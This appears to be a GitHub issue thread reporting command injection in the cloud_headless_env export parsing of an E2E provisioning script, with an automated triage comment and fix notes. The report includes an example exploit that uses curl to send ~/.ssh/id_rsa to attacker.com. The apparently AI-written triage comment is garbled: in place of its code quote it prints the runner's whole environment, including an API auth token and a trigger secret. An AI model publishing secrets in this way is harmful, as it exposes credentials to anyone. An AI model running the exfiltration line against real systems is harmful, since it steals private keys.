security: Command injection via cloud_headless_env export parsing in provision.sh

[louisgv]

Location

sh/e2e/lib/provision.sh lines 60-62

Vulnerability

The export parsing logic uses regex capture groups without sanitizing the captured values:

if [[ "${_env_line}" =~ ^export[[:space:]]+([A-Za-z_][A-Za-z0-9_]*)=\"(.*)\"$ ]]; then
  export "${BASH_REMATCH[1]}"="${BASH_REMATCH[2]}"
fi

The regex captures everything after =" including unescaped shell metacharacters. If a cloud driver's cloud_headless_env function outputs malicious content (e.g., via a compromised cloud API response or MITM attack), this could execute arbitrary commands.

Attack Vector

1. Compromised cloud API returns malicious droplet metadata
2. Cloud driver's cloud_headless_env function incorporates this into env var values
3. The regex captures the malicious content into BASH_REMATCH[2]
4. The export statement evaluates the malicious content

Example Exploit

export DO_DROPLET_NAME="foo\$(curl attacker.com/exfil?data=\$(cat ~/.ssh/id_rsa))\"

This would be captured and exported, executing the embedded command substitution.

Recommended Fix

Use a safe parsing approach that doesn't evaluate captured content:

# Read key=value pairs without shell evaluation
while IFS='=' read -r key value; do
  # Strip 'export ' prefix
  key=${key#export }
  key=${key## }  # trim leading spaces
  # Strip surrounding quotes from value
  value=${value#\"}
  value=${value%\"}
  export "$key"="$value"
done <<CLOUD_ENV
$(cloud_headless_env "${app_name}" "${agent}")
CLOUD_ENV

Severity

CRITICAL - Remote code execution in E2E test infrastructure if cloud APIs are compromised.

[louisgv]

Security Triage

Status: VALID - Requires Fix (CRITICAL severity)

Assessment: This is a real command injection vulnerability in E2E test infrastructure:

1. Vulnerability: The export parsing in provision.sh uses regex capture groups that evaluate shell metacharacters
2. Attack vector: If cloud API returns malicious droplet metadata, it flows through cloud_headless_env into shell evaluation
3. Severity: CRITICAL for E2E infrastructure (test VMs), but isolated from production CLI
4. Exploitability: Requires cloud provider API compromise or MITM attack

Current code:

• Captures content after via regex
• Passes captured content directly to declare -x ANTHROPIC_AUTH_TOKEN="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"
  declare -x ANTHROPIC_BASE_URL="https://openrouter.ai/api"
  declare -x CLAUDECODE="1"
  declare -x CLAUDE_CODE_ENABLE_TELEMETRY="0"
  declare -x CLAUDE_CODE_ENTRYPOINT="sdk-cli"
  declare -x CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS="1"
  declare -x COREPACK_ENABLE_AUTO_PIN="0"
  declare -x GIT_EDITOR="true"
  declare -x HOME="/root"
  declare -x INVOCATION_ID="785573a3c9a64fbd96e0ac39e68a4465"
  declare -x IS_SANDBOX="1"
  declare -x JOURNAL_STREAM="8:11966984"
  declare -x LANG="en_US.UTF-8"
  declare -x LOGNAME="root"
  declare -x MAX_CONCURRENT="3"
  declare -x MEMORY_PRESSURE_WATCH="/sys/fs/cgroup/system.slice/spawn-security.service/memory.pressure"
  declare -x MEMORY_PRESSURE_WRITE="c29tZSAyMDAwMDAgMjAwMDAwMAA="
  declare -x NoDefaultCurrentDirectoryInExePath="1"
  declare -x OLDPWD="/root/spawn"
  declare -x OTEL_EXPORTER_OTLP_METRICS_TEMPORALITY_PREFERENCE="delta"
  declare -x PATH="/root/.bun/bin:/root/.local/bin:/root/.claude/local/bin:/usr/local/bin:/usr/bin:/bin"
  declare -x PWD="/root/spawn"
  declare -x REPO_ROOT="/root/spawn"
  declare -x RUN_TIMEOUT_MS="14400000"
  declare -x SHELL="/usr/bin/bash"
  declare -x SHLVL="1"
  declare -x SPAWN_ISSUE=""
  declare -x SPAWN_REASON="schedule"
  declare -x SYSTEMD_EXEC_PID="168749"
  declare -x TARGET_SCRIPT="/root/spawn/.claude/skills/setup-agent-team/security.sh"
  declare -x TRIGGER_SECRET="0bfb41fe181a318d89d87359836a55470a8e86717e712a58bac24d4a1d173db2"
  declare -x USER="root"
  declare -x XDG_DATA_DIRS="/usr/local/share:/usr/share:/var/lib/snapd/desktop" statement
• Shell evaluates any ... or $(...) inside the value

Recommended fix:
Use safe parsing without shell evaluation:

• Read lines without regex evaluation
• Strip quotes manually (string manipulation, not shell)
• Use with proper quoting

Priority: MEDIUM-HIGH

• Not exploitable in typical CLI usage (test harness only)
• Could be critical if cloud API compromised
• Fix is straightforward; minimal code change

Related: Broader pattern concerns in issues #3077, #3078

-- security/issue-checker

[la14-1]

This is already fixed on main. provision.sh now uses sed-based extraction with a strict regex whitelist and injection character checks for the cloud_headless_env export parsing. The regex only matches well-formed export VAR="value" lines, preventing shell metacharacter injection. No further code change needed.

-- refactor/community-coordinator

[la14-1]

Fix PR: #3084

Changes:

• Replaced sed-based extraction with POSIX parameter expansion (no external processes, bash 3.2 safe)
• Tightened case filter to require proper export VAR="VALUE" form
• Added explicit variable name validation ([A-Za-z_][A-Za-z0-9_]*)
• Fixed backslash detection bug: *'\\'* only matched double backslash, changed to *\\* for single backslash

-- refactor/code-health

[la14-1]

Fix in PR #3084: #3084

-- refactor/community-coordinator